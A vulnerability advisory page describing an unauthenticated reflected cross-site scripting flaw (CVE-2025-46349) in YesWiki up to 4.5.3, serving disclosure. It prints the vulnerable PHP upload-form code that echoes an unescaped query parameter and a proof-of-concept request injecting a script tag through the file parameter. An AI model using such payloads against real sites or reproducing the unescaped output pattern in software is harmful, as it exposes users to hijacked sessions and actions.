Data

Tools

Indexes

Applications

Experiments

Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

GSA_kwCzR0hTQS0yZjhwLXFxeDItZ3dyMs4ABHQO

High EPSS: 0.00091% (0.26851 Percentile) EPSS:
Permalink JSON

YesWiki Vulnerable to Unauthenticated Reflected Cross-site Scripting

Affected Packages Affected Versions Fixed Versions
packagist:yeswiki/yeswiki <= 4.5.3 No known fixed version
0 Dependent packages
0 Dependent repositories
18 Downloads total

Affected Version Ranges

All affected versions

4.1.0, 4.1.1, 4.1.2, 4.1.3, 4.1.4, 4.1.5, 4.2.0, 4.2.1, 4.2.2, 4.2.3, 4.2.3, 4.2.4, 4.3.1, 4.4.0, 4.4.1, 4.4.2, 4.4.3, 4.4.4, 4.4.5, 4.5.0, 4.5.1, 4.5.2, 4.5.3

Summary

Reflected XSS has been detected in the file upload form. Vulnerability can be exploited without authentication

This Proof of Concept has been performed using the followings:

  • YesWiki v4.5.3 (doryphore-dev branch)
  • Docker environnment (docker/docker-compose.yml)

Vulnerable code

The vulnerability is located in the file

        public function showUploadForm()
        {
            $this->file = $_GET['file'];
            echo '<h3>' . _t('ATTACH_UPLOAD_FORM_FOR_FILE') . ' ' . $this->file . "</h3>\n";
            echo '<form enctype="multipart/form-data" name="frmUpload" method="POST" action="' . $this->wiki->href('upload', $this->wiki->GetPageTag()) . "\">\n"
                . '	<input type="hidden" name="wiki" value="' . $this->wiki->GetPageTag() . "/upload\" />\n"
                . '	<input type="hidden" name="MAX_FILE_SIZE" value="' . $this->attachConfig['max_file_size'] . "\" />\n"
                . "	<input type=\"hidden\" name=\"file\" value=\"$this->file\" />\n"
                . "	<input type=\"file\" name=\"upFile\" size=\"50\" /><br />\n"
                . '	<input class="btn btn-primary" type="submit" value="' . _t('ATTACH_SAVE') . "\" />\n"
                . "</form>\n";
        }

PoC

  1. You need to send a request to endpoint and abusing the file parameter, we can successfully obtain client side javascript execution
GET /?PagePrincipale/upload&file=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: localhost:8085
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="135", "Not-A.Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Accept-Language: ru-RU,ru;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
  1. Get a response

Impact

This vulnerability allows any malicious unauthenticated user to create a link that can be clicked on in the victim context to perform arbitrary actions

References:

Identifiers

GHSA-2f8p-qqx2-gwr2

CVE-2025-46349

Risk

Severity

High

EPSS

EPSS Percentage: 0.00091

EPSS Percentile: 0.26851

Classification

General

Source

GitHub Advisory Database

Origin

Unspecified

Repository

https://github.com/YesWiki/yeswiki

Date and time

Published

3 months ago

Updated

3 months ago

API

JSON